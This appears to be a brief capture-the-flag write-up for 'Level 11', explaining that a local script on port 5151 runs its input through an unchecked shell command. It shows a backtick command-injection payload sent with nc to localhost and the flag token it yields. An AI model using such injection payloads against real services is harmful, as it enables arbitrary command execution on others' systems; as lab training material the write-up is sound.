## Level 11

There is a scrit in home that takes an input from network on port 5151 and try to checksum it.
The checksum is done on the with a command line not checked, so the exploit is trivial

```bash
$> echo '`getflag > /tmp/toto`' | nc 127.0.0.1 5151
Password: Erf nope..
$> cat /tmp/toto
Check flag.Here is your token : fa6v5ateaw21peobuub8ipe6s
```